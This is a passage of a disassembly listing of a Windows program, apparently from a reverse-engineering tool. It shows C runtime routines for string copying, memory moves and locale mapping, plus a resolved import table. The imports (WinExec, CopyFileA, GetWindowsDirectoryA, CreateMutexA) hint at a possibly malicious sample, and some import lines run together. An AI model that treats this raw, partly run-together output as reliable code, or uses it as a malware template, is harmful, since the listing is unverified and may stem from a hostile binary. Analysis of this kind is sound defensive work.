cmp ecx, edx
jbe short loc_4045D8
loc_404611: ; CODE XREF: sub_404568+6B�j
mov eax, [ebp+var_4]
lea ecx, [edi+0Ch]
add eax, 1F8h
push 1
pop edi
mov [eax+4], ecx
mov [ecx+8], eax
lea ecx, [edx+0Ch]
mov [eax+8], ecx
mov [ecx+4], eax
and dword ptr [esi+ebx*4+44h], 0
mov [esi+ebx*4+0C4h], edi
mov al, [esi+43h]
mov cl, al
inc cl
test al, al
mov eax, [ebp+arg_0]
mov [esi+43h], cl
jnz short loc_40464E
or [eax+4], edi
loc_40464E: ; CODE XREF: sub_404568+E1�j
mov edx, 80000000h
mov ecx, ebx
shr edx, cl
not edx
and [eax+8], edx
mov eax, ebx
loc_40465E: ; CODE XREF: sub_404568+5E�j
pop edi
pop esi
pop ebx
leave
retn
sub_404568 endp
; =============== S U B R O U T I N E =======================================
sub_404663 proc near ; CODE XREF: sub_4036B9+11F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
xor ebx, ebx
cmp dword_407240, ebx
push esi
push edi
jnz short loc_4046B2
push offset aUser32_dll ; "user32.dll"
call dword_405060 ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_4046E8
mov esi, dword_4050B0
push offset aMessageboxa ; "MessageBoxA"
push edi
call esi ; dword_4050B0
test eax, eax
mov dword_407240, eax
jz short loc_4046E8
push offset aGetactivewindo ; "GetActiveWindow"
push edi
call esi ; dword_4050B0
push offset aGetlastactivep ; "GetLastActivePopup"
push edi
mov dword_407244, eax
call esi ; dword_4050B0
mov dword_407248, eax
loc_4046B2: ; CODE XREF: sub_404663+B�j
mov eax, dword_407244
test eax, eax
jz short loc_4046D1
call eax ; dword_407244
mov ebx, eax
test ebx, ebx
jz short loc_4046D1
mov eax, dword_407248
test eax, eax
jz short loc_4046D1
push ebx
call eax ; dword_407248
mov ebx, eax
loc_4046D1: ; CODE XREF: sub_404663+56�j
; sub_404663+5E�j ...
push [esp+0Ch+arg_8]
push [esp+10h+arg_4]
push [esp+14h+arg_0]
push ebx
call dword_407240 ; MessageBoxA
loc_4046E4: ; CODE XREF: sub_404663+87�j
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_4046E8: ; CODE XREF: sub_404663+1C�j
; sub_404663+33�j
xor eax, eax
jmp short loc_4046E4
sub_404663 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4046F0 proc near ; CODE XREF: sub_4036B9+C5�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
push edi
test ecx, ecx
jz short loc_404773
push esi
push ebx
mov ebx, ecx
mov esi, [esp+0Ch+arg_4]
test esi, 3
mov edi, [esp+0Ch+arg_0]
jnz short loc_404714
shr ecx, 2
jnz short loc_404781
jmp short loc_404735
; ---------------------------------------------------------------------------
loc_404714: ; CODE XREF: sub_4046F0+1B�j
; sub_4046F0+37�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
dec ecx
jz short loc_404742
test al, al
jz short loc_40474A
test esi, 3
jnz short loc_404714
mov ebx, ecx
shr ecx, 2
jnz short loc_404781
loc_404730: ; CODE XREF: sub_4046F0+8F�j
and ebx, 3
jz short loc_404742
loc_404735: ; CODE XREF: sub_4046F0+22�j
; sub_4046F0+50�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
test al, al
jz short loc_40476E
dec ebx
jnz short loc_404735
loc_404742: ; CODE XREF: sub_4046F0+2B�j
; sub_4046F0+43�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_40474A: ; CODE XREF: sub_4046F0+2F�j
test edi, 3
jz short loc_404764
loc_404752: ; CODE XREF: sub_4046F0+72�j
mov [edi], al
inc edi
dec ecx
jz loc_4047E6
test edi, 3
jnz short loc_404752
loc_404764: ; CODE XREF: sub_4046F0+60�j
mov ebx, ecx
shr ecx, 2
jnz short loc_4047D7
loc_40476B: ; CODE XREF: sub_4046F0+7F�j
; sub_4046F0+F4�j
mov [edi], al
inc edi
loc_40476E: ; CODE XREF: sub_4046F0+4D�j
dec ebx
jnz short loc_40476B
pop ebx
pop esi
loc_404773: ; CODE XREF: sub_4046F0+7�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_404779: ; CODE XREF: sub_4046F0+A9�j
; sub_4046F0+C1�j
mov [edi], edx
add edi, 4
dec ecx
jz short loc_404730
loc_404781: ; CODE XREF: sub_4046F0+20�j
; sub_4046F0+3E�j
mov edx, 7EFEFEFFh
mov eax, [esi]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [esi]
add esi, 4
test eax, 81010100h
jz short loc_404779
test dl, dl
jz short loc_4047CB
test dh, dh
jz short loc_4047C1
test edx, 0FF0000h
jz short loc_4047B7
test edx, 0FF000000h
jnz short loc_404779
mov [edi], edx
jmp short loc_4047CF
; ---------------------------------------------------------------------------
loc_4047B7: ; CODE XREF: sub_4046F0+B9�j
and edx, 0FFFFh
mov [edi], edx
jmp short loc_4047CF
; ---------------------------------------------------------------------------
loc_4047C1: ; CODE XREF: sub_4046F0+B1�j
and edx, 0FFh
mov [edi], edx
jmp short loc_4047CF
; ---------------------------------------------------------------------------
loc_4047CB: ; CODE XREF: sub_4046F0+AD�j
xor edx, edx
mov [edi], edx
loc_4047CF: ; CODE XREF: sub_4046F0+C5�j
; sub_4046F0+CF�j ...
add edi, 4
xor eax, eax
dec ecx
jz short loc_4047E1
loc_4047D7: ; CODE XREF: sub_4046F0+79�j
xor eax, eax
loc_4047D9: ; CODE XREF: sub_4046F0+EF�j
mov [edi], eax
add edi, 4
dec ecx
jnz short loc_4047D9
loc_4047E1: ; CODE XREF: sub_4046F0+E5�j
and ebx, 3
jnz short loc_40476B
loc_4047E6: ; CODE XREF: sub_4046F0+66�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
sub_4046F0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4047EE proc near ; CODE XREF: sub_403BD6+BE�p
; sub_403BD6+E6�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_405498
push offset sub_4035A8
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 1Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
xor edi, edi
cmp dword_40726C, edi
jnz short loc_404864
push edi
push edi
push 1
pop ebx
push ebx
push offset dword_405448
mov esi, 100h
push esi
push edi
call dword_4050AC ; LCMapStringW
test eax, eax
jz short loc_404842
mov dword_40726C, ebx
jmp short loc_404864
; ---------------------------------------------------------------------------
loc_404842: ; CODE XREF: sub_4047EE+4A�j
push edi
push edi
push ebx
push offset dword_4070C8
push esi
push edi
call dword_4050B4 ; LCMapStringA
test eax, eax
jz loc_40497C
mov dword_40726C, 2
loc_404864: ; CODE XREF: sub_4047EE+2E�j
; sub_4047EE+52�j
cmp [ebp+arg_C], edi
jle short loc_404879
push [ebp+arg_C]
push [ebp+arg_8]
call sub_404A12
pop ecx
pop ecx
mov [ebp+arg_C], eax
loc_404879: ; CODE XREF: sub_4047EE+79�j
mov eax, dword_40726C
cmp eax, 2
jnz short loc_4048A0
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_4050B4 ; LCMapStringA
jmp loc_40497E
; ---------------------------------------------------------------------------
loc_4048A0: ; CODE XREF: sub_4047EE+93�j
cmp eax, 1
jnz loc_40497C
cmp [ebp+arg_18], edi
jnz short loc_4048B6
mov eax, dword_407264
mov [ebp+arg_18], eax
loc_4048B6: ; CODE XREF: sub_4047EE+BE�j
push edi
push edi
push [ebp+arg_C]
push [ebp+arg_8]
mov eax, [ebp+arg_1C]
neg eax
sbb eax, eax
and eax, 8
inc eax
push eax
push [ebp+arg_18]
call dword_405084 ; MultiByteToWideChar
mov ebx, eax
mov [ebp+var_1C], ebx
cmp ebx, edi
jz loc_40497C
mov [ebp+var_4], edi
lea eax, [ebx+ebx]
add eax, 3
and al, 0FCh
call sub_4026C0
mov [ebp+var_18], esp
mov eax, esp
mov [ebp+var_24], eax
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_404911
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor edi, edi
mov [ebp+var_24], edi
or [ebp+var_4], 0FFFFFFFFh
mov ebx, [ebp+var_1C]
loc_404911: ; CODE XREF: sub_4047EE+10E�j
cmp [ebp+var_24], edi
jz short loc_40497C
push ebx
push [ebp+var_24]
push [ebp+arg_C]
push [ebp+arg_8]
push 1
push [ebp+arg_18]
call dword_405084 ; MultiByteToWideChar
test eax, eax
jz short loc_40497C
push edi
push edi
push ebx
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_4050AC ; LCMapStringW
mov esi, eax
mov [ebp+var_28], esi
cmp esi, edi
jz short loc_40497C
test byte ptr [ebp+arg_4+1], 4
jz short loc_404990
cmp [ebp+arg_14], edi
jz loc_404A0B
cmp esi, [ebp+arg_14]
jg short loc_40497C
push [ebp+arg_14]
push [ebp+arg_10]
push ebx
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_4050AC ; LCMapStringW
test eax, eax
jnz loc_404A0B
loc_40497C: ; CODE XREF: sub_4047EE+66�j
; sub_4047EE+B5�j ...
xor eax, eax
loc_40497E: ; CODE XREF: sub_4047EE+AD�j
; sub_4047EE+21F�j
lea esp, [ebp-38h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_404990: ; CODE XREF: sub_4047EE+160�j
mov [ebp+var_4], 1
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_4026C0
mov [ebp+var_18], esp
mov ebx, esp
mov [ebp+var_20], ebx
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_4049C4
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor edi, edi
xor ebx, ebx
or [ebp+var_4], 0FFFFFFFFh
mov esi, [ebp+var_28]
loc_4049C4: ; CODE XREF: sub_4047EE+1C2�j
cmp ebx, edi
jz short loc_40497C
push esi
push ebx
push [ebp+var_1C]
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_4050AC ; LCMapStringW
test eax, eax
jz short loc_40497C
cmp [ebp+arg_14], edi
push edi
push edi
jnz short loc_4049EB
push edi
push edi
jmp short loc_4049F1
; ---------------------------------------------------------------------------
loc_4049EB: ; CODE XREF: sub_4047EE+1F7�j
push [ebp+arg_14]
push [ebp+arg_10]
loc_4049F1: ; CODE XREF: sub_4047EE+1FB�j
push esi
push ebx
push 220h
push [ebp+arg_18]
call dword_4050C0 ; WideCharToMultiByte
mov esi, eax
cmp esi, edi
jz loc_40497C
loc_404A0B: ; CODE XREF: sub_4047EE+165�j
; sub_4047EE+188�j
mov eax, esi
jmp loc_40497E
sub_4047EE endp
; =============== S U B R O U T I N E =======================================
sub_404A12 proc near ; CODE XREF: sub_4047EE+81�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
mov eax, [esp+arg_0]
test edx, edx
push esi
lea ecx, [edx-1]
jz short loc_404A2F
loc_404A22: ; CODE XREF: sub_404A12+1B�j
cmp byte ptr [eax], 0
jz short loc_404A2F
inc eax
mov esi, ecx
dec ecx
test esi, esi
jnz short loc_404A22
loc_404A2F: ; CODE XREF: sub_404A12+E�j
; sub_404A12+13�j
cmp byte ptr [eax], 0
pop esi
jnz short loc_404A3A
sub eax, [esp+arg_0]
retn
; ---------------------------------------------------------------------------
loc_404A3A: ; CODE XREF: sub_404A12+21�j
mov eax, edx
retn
sub_404A12 endp
; =============== S U B R O U T I N E =======================================
sub_404A3D proc near ; CODE XREF: sub_403DB8+1F�p
arg_0 = dword ptr 4
mov eax, dword_407274
test eax, eax
jz short loc_404A55
push [esp+arg_0]
call eax ; dword_407274
test eax, eax
pop ecx
jz short loc_404A55
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_404A55: ; CODE XREF: sub_404A3D+7�j
; sub_404A3D+12�j
xor eax, eax
retn
sub_404A3D endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404A60 proc near ; CODE XREF: sub_403E83+2EE�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_404A80
cmp edi, eax
jb loc_404BF8
loc_404A80: ; CODE XREF: sub_404A60+16�j
test edi, 3
jnz short loc_404A9C
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_404ABC
rep movsd
jmp off_404BA8[edx*4]
; ---------------------------------------------------------------------------
loc_404A9C: ; CODE XREF: sub_404A60+26�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_404AB4
and eax, 3
add ecx, eax
jmp dword ptr loc_404ABC+4[eax*4]
; ---------------------------------------------------------------------------
loc_404AB4: ; CODE XREF: sub_404A60+46�j
jmp dword ptr loc_404BB8[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_404ABC: ; CODE XREF: sub_404A60+31�j
; sub_404A60+8E�j ...
jmp off_404B3C[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_404AD0
dd offset loc_404AFC
dd offset loc_404B20
; ---------------------------------------------------------------------------
loc_404AD0: ; DATA XREF: sub_404A60+64�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_404ABC
rep movsd
jmp off_404BA8[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_404AFC: ; DATA XREF: sub_404A60+68�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_404ABC
rep movsd
jmp off_404BA8[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_404B20: ; DATA XREF: sub_404A60+6C�o
and edx, ecx
mov al, [esi]
mov [edi], al
inc esi
shr ecx, 2
inc edi
cmp ecx, 8
jb short loc_404ABC
rep movsd
jmp off_404BA8[edx*4]
; ---------------------------------------------------------------------------
align 4
off_404B3C dd offset loc_404B9F ; DATA XREF: sub_404A60:loc_404ABC�r
dd offset loc_404B8C
dd offset loc_404B84
dd offset loc_404B7C
dd offset loc_404B74
dd offset loc_404B6C
dd offset loc_404B64
dd offset loc_404B5C
; ---------------------------------------------------------------------------
loc_404B5C: ; CODE XREF: sub_404A60:loc_404ABC�j
; DATA XREF: sub_404A60+F8�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_404B64: ; CODE XREF: sub_404A60:loc_404ABC�j
; DATA XREF: sub_404A60+F4�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_404B6C: ; CODE XREF: sub_404A60:loc_404ABC�j
; DATA XREF: sub_404A60+F0�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_404B74: ; CODE XREF: sub_404A60:loc_404ABC�j
; DATA XREF: sub_404A60+EC�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_404B7C: ; CODE XREF: sub_404A60:loc_404ABC�j
; DATA XREF: sub_404A60+E8�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_404B84: ; CODE XREF: sub_404A60:loc_404ABC�j
; DATA XREF: sub_404A60+E4�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_404B8C: ; CODE XREF: sub_404A60:loc_404ABC�j
; DATA XREF: sub_404A60+E0�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_404B9F: ; CODE XREF: sub_404A60:loc_404ABC�j
; DATA XREF: sub_404A60:off_404B3C�o
jmp off_404BA8[edx*4]
; ---------------------------------------------------------------------------
align 4
off_404BA8 dd offset loc_404BB8 ; DATA XREF: sub_404A60+35�r
; sub_404A60+92�r ...
dd offset loc_404BC0
dd offset loc_404BCC
dd offset loc_404BE0
; ---------------------------------------------------------------------------
loc_404BB8: ; CODE XREF: sub_404A60+35�j
; sub_404A60+92�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_404BC0: ; CODE XREF: sub_404A60+35�j
; sub_404A60+92�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_404BCC: ; CODE XREF: sub_404A60+35�j
; sub_404A60+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_404BE0: ; CODE XREF: sub_404A60+35�j
; sub_404A60+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_404BF8: ; CODE XREF: sub_404A60+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_404C2C
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_404C20
std
rep movsd
cld
jmp off_404D40[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_404C20: ; CODE XREF: sub_404A60+1B1�j
; sub_404A60+208�j ...
neg ecx
jmp off_404CF0[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_404C2C: ; CODE XREF: sub_404A60+1A6�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_404C44
and eax, 3
sub ecx, eax
jmp dword ptr loc_404C44+4[eax*4]
; ---------------------------------------------------------------------------
loc_404C44: ; CODE XREF: sub_404A60+1D6�j
; DATA XREF: sub_404A60+1DD�r
jmp off_404D40[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_404C58
dd offset loc_404C78
dd offset loc_404CA0
; ---------------------------------------------------------------------------
loc_404C58: ; DATA XREF: sub_404A60+1EC�o
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
dec esi
shr ecx, 2
dec edi
cmp ecx, 8
jb short loc_404C20
std
rep movsd
cld
jmp off_404D40[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_404C78: ; DATA XREF: sub_404A60+1F0�o
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
sub edi, 2
cmp ecx, 8
jb short loc_404C20
std
rep movsd
cld
jmp off_404D40[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_404CA0: ; DATA XREF: sub_404A60+1F4�o
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_404C20
std
rep movsd
cld
jmp off_404D40[edx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_404CF4
dd offset loc_404CFC
dd offset loc_404D04
dd offset loc_404D0C
dd offset loc_404D14
dd offset loc_404D1C
dd offset loc_404D24
off_404CF0 dd offset loc_404D37 ; DATA XREF: sub_404A60+1C2�r
; ---------------------------------------------------------------------------
loc_404CF4: ; DATA XREF: sub_404A60+274�o
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
loc_404CFC: ; DATA XREF: sub_404A60+278�o
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
loc_404D04: ; DATA XREF: sub_404A60+27C�o
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
loc_404D0C: ; DATA XREF: sub_404A60+280�o
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
loc_404D14: ; DATA XREF: sub_404A60+284�o
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
loc_404D1C: ; DATA XREF: sub_404A60+288�o
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
loc_404D24: ; DATA XREF: sub_404A60+28C�o
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_404D37: ; CODE XREF: sub_404A60+1C2�j
; DATA XREF: sub_404A60:off_404CF0�o
jmp off_404D40[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_404D40 dd offset loc_404D50 ; DATA XREF: sub_404A60+1B7�r
; sub_404A60:loc_404C44�r ...
dd offset loc_404D58
dd offset loc_404D68
dd offset loc_404D7C
; ---------------------------------------------------------------------------
loc_404D50: ; CODE XREF: sub_404A60+1B7�j
; sub_404A60:loc_404C44�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_404D58: ; CODE XREF: sub_404A60+1B7�j
; sub_404A60:loc_404C44�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_404D68: ; CODE XREF: sub_404A60+1B7�j
; sub_404A60:loc_404C44�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_404D7C: ; CODE XREF: sub_404A60+1B7�j
; sub_404A60:loc_404C44�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_404A60 endp
; ---------------------------------------------------------------------------
align 2
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_404D96 proc near ; CODE XREF: sub_401B1B+33�p
jmp dword_405148
sub_404D96 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_404D9C proc near ; CODE XREF: sub_401B1B+24�p
jmp dword_405140
sub_404D9C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_404DA2 proc near ; CODE XREF: sub_401B1B+7�p
jmp dword_405144
sub_404DA2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_404DA8 proc near ; CODE XREF: sub_4034B0+13�p
jmp dword_40508C
sub_404DA8 endp
; ---------------------------------------------------------------------------
align 10h
dd 94h dup(0)
dword_405000 dd 0 ; sub_40219B+C8�r
dword_405004 dd 0 dword_405008 dd 0 dword_40500C dd 0 ; sub_40219B+97�r
dword_405010 dd 0 align 8
dword_405018 dd 7C80BE01h ; resolved to->KERNEL32.lstrcpyA ; sub_40126C+8F�r ...
dword_40501C dd 7C834E64h ; resolved to->KERNEL32._lclose ; sub_401B59+2AB�r
dword_405020 dd 7C838AE7h ; resolved to->KERNEL32._lwritedword_405024 dd 7C835406h ; resolved to->KERNEL32._llseekdword_405028 dd 7C8365A5h ; resolved to->KERNEL32._lcreatdword_40502C dd 7C802442h ; resolved to->KERNEL32.Sleep ; sub_401583+4D0�r ...
dword_405030 dd 7C8353CEh ; resolved to->KERNEL32._lreaddword_405034 dd 7C85E830h ; resolved to->KERNEL32._lopendword_405038 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameA ; sub_401F4B+14D�r ...
dword_40503C dd 7C810637h ; resolved to->KERNEL32.CreateThread ; sub_4020D9:loc_40213A�r
dword_405040 dd 7C86136Dh ; resolved to->KERNEL32.WinExecdword_405044 dd 7C80C108h ; resolved to->KERNEL32.SetThreadPrioritydword_405048 dd 7C8098EBh ; resolved to->KERNEL32.GetCurrentThreaddword_40504C dd 7C910331h ; resolved to->NTDLL.RtlGetLastWin32Errordword_405050 dd 7C80E93Fh ; resolved to->KERNEL32.CreateMutexAdword_405054 dd 7C80929Ch ; resolved to->KERNEL32.GetTickCountdword_405058 dd 7C8286EEh ; resolved to->KERNEL32.CopyFileAdword_40505C dd 7C821363h ; resolved to->KERNEL32.GetWindowsDirectoryAdword_405060 dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryAdword_405064 dd 7C9179FDh ; resolved to->NTDLL.RtlReAllocateHeapdword_405068 dd 7C809A51h ; resolved to->KERNEL32.VirtualAlloc ; sub_404568+51�r
dword_40506C dd 7C9105D4h ; resolved to->NTDLL.RtlAllocateHeap ; sub_403E1A+D�r ...
dword_405070 dd 7C8127A7h ; resolved to->KERNEL32.GetOEMCPdword_405074 dd 7C809915h ; resolved to->KERNEL32.GetACPdword_405078 dd 7C812E76h ; resolved to->KERNEL32.GetCPInfo ; sub_403BD6+14�r
dword_40507C dd 7C80A490h ; resolved to->KERNEL32.GetStringTypeW ; sub_40380C+12D�r
dword_405080 dd 7C838A0Ch ; resolved to->KERNEL32.GetStringTypeA ; sub_40380C+8D�r
dword_405084 dd 7C809BF8h ; resolved to->KERNEL32.MultiByteToWideChar ; sub_40380C+11B�r ...
dword_405088 dd 7C810D87h ; resolved to->KERNEL32.WriteFiledword_40508C dd 7C937A40h ; resolved to->NTDLL.RtlUnwinddword_405090 dd 7C91043Dh ; resolved to->NTDLL.RtlFreeHeap ; sub_403E83+2C4�r ...
dword_405094 dd 7C809AE4h ; resolved to->KERNEL32.VirtualFreedword_405098 dd 7C812BB6h ; resolved to->KERNEL32.HeapCreatedword_40509C dd 7C810EF8h ; resolved to->KERNEL32.HeapDestroydword_4050A0 dd 7C810E51h ; resolved to->KERNEL32.GetFileType ; sub_4032C7+166�r
dword_4050A4 dd 7C812F39h ; resolved to->KERNEL32.GetStdHandle ; sub_4036B9+143�r
dword_4050A8 dd 7C80CC97h ; resolved to->KERNEL32.SetHandleCountdword_4050AC dd 7C80CCA8h ; resolved to->KERNEL32.LCMapStringW ; sub_4047EE+14D�r ...
dword_4050B0 dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddressdword_4050B4 dd 7C838DE8h ; resolved to->KERNEL32.LCMapStringA ; sub_4047EE+A7�r
dword_4050B8 dd 7C812F08h ; resolved to->KERNEL32.GetEnvironmentStringsWdword_4050BC dd 7C81CF5Bh ; resolved to->KERNEL32.GetEnvironmentStringsA ; sub_403195+E1�r
dword_4050C0 dd 7C80A0D4h ; resolved to->KERNEL32.WideCharToMultiByte ; sub_4047EE+20D�r
dword_4050C4 dd 7C814AE7h ; resolved to->KERNEL32.FreeEnvironmentStringsWdword_4050C8 dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleAdword_4050CC dd 7C801EEEh ; resolved to->KERNEL32.GetStartupInfoA ; sub_4032C7+59�r
dword_4050D0 dd 7C812F1Dh ; resolved to->KERNEL32.GetCommandLineAdword_4050D4 dd 7C8111DAh ; resolved to->KERNEL32.GetVersiondword_4050D8 dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcess ; sub_402C00+91�r
dword_4050DC dd 7C801E16h ; resolved to->KERNEL32.TerminateProcessdword_4050E0 dd 7C80DDF5h ; resolved to->KERNEL32.GetCurrentProcessdword_4050E4 dd 7C862E2Ah ; resolved to->KERNEL32.UnhandledExceptionFilterdword_4050E8 dd 7C81DF77h ; resolved to->KERNEL32.FreeEnvironmentStringsA align 10h
dword_4050F0 dd 7E41A8ADh ; resolved to->USER32.wsprintfA ; sub_40137D+26�r ...
dword_4050F4 dd 7E45058Ah ; resolved to->USER32.MessageBoxA dd 0
dword_4050FC dd 0 dd 0
dword_405104 dd 0 dword_405108 dd 0 dword_40510C dd 0 dword_405110 dd 0 dword_405114 dd 0 ; sub_401583+2DD�r ...
dword_405118 dd 0 ; sub_40137D+151�r ...
dword_40511C dd 0 ; sub_40126C+27�r ...
dword_405120 dd 0 ; sub_40126C+51�r ...
dword_405124 dd 0 ; sub_40126C+6C�r ...
dword_405128 dd 0 ; sub_40126C+105�r ...
dword_40512C dd 0 dword_405130 dd 0 dword_405134 dd 0 ; sub_4011D5+7�r ...
dword_405138 dd 0 ; sub_4011D5+1E�r ...
align 10h
dword_405140 dd 0 dword_405144 dd 0 dword_405148 dd 0 align 10h
dword_405150 dd 0FFFFFFFFh, 402A05h, 402A19h, 746E7572h, 20656D69h
; DATA XREF: .text:00402933�o
dd 6F727265h, 2072h, 534F4C54h, 72652053h, 0D726F72h, 0Ah
dd 474E4953h, 72726520h, 0A0D726Fh, 0
dd 414D4F44h, 65204E49h, 726F7272h, 0A0Dh, 32303652h, 2D0A0D38h
dd 616E7520h, 20656C62h, 69206F74h, 6974696Eh, 7A696C61h
dd 65682065h, 0A0D7061h, 0
aR6027NotEnough db 'R6027',0Dh,0Ah
